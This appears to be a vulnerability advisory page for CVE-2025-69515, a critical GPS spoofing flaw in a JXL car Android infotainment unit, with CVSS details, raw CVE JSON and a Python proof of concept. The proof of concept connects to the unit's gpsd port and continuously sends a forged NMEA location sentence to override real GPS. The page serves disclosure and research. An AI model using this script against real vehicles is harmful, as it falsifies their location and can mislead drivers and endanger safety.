Security Vulnerability Report
CVE-2025-69515 CVSS 9.1 CRITICAL

CVE-2025-69515

Published: 2026-04-07 20:16:23
Last Modified: 2026-04-09 15:16:09

Description

An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

JXL 9 Inch Car Android Double Din Player Android v12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for GPS Spoofing on JXL Infotainment System
# This script simulates sending malicious NMEA sentences to a target service.
import socket
import time

TARGET_IP = "192.168.1.100"  # Example IP of the car infotainment system
TARGET_PORT = 2947           # Common port for GPS data services (gpsd)

# Malicious NMEA sentence (Location: Eiffel Tower)
# Format: $GPGGA,Time,Latitude,N,Longitude,E,Quality,NumSatellites,HDOP,Altitude,M,GeoidSep,M,DGPSAge,DGPSStationID*Checksum
FAKE_NMEA = "$GPGGA,092750.000,4851.0000,N,00220.0000,E,1,08,0.9,545.4,M,46.9,M,,*47\r\n"


def send_spoofed_gps():
    s = None  # defined up front so the finally block is safe if socket creation fails
    try:
        print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...")
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((TARGET_IP, TARGET_PORT))
        print("[+] Connection established. Sending spoofed GPS data...")
        while True:
            # Send the fake NMEA sentence
            s.send(FAKE_NMEA.encode('ascii'))
            print(f"[Sent] {FAKE_NMEA.strip()}")
            time.sleep(1)  # Send continuously to override real GPS
    except socket.error as e:
        print(f"[-] Socket Error: {e}")
    except KeyboardInterrupt:
        print("\n[*] Stopping PoC.")
    finally:
        if s is not None:
            s.close()


if __name__ == "__main__":
    send_spoofed_gps()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69515", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:22.950", "lastModified": "2026-04-09T15:16:08.863", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-941"}]}], "references": [{"url": "http://jxl.com", "source": "[email protected]"}, {"url": "https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md", "source": "[email protected]"}]}}